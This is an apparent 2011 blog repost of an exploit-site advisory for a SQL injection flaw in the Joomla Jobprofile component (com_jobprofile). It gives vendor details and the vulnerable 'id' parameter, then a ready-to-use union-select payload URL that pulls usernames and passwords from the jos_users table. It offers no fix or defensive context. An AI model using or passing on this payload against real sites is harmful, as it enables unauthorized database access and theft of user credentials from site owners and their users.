Friday, December 30, 2011

Joomla Component Jobprofile SQL INJECTION

2:09 AM    No comments

FROM:1337day.com


Code:
[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
[~] Author : kaMtiEz (kamtiez@exploit-id.com)
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 2 Dec , 2011
 
[ Software Information ]
 
[+] Vendor : http://www.thakkertech.com/
[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
[+] Version : null / 1.0 maybe :D
[+] Price : 25,00
[+] Vulnerability : SQL INJECTION
[+] Dork : "think it :D"
[+] LOCATION :  INDONESIA -
 
[ Vulnerable File ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
 
[ XpL ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--
 

Newer Post Older Post Home

0 comments:

Post a Comment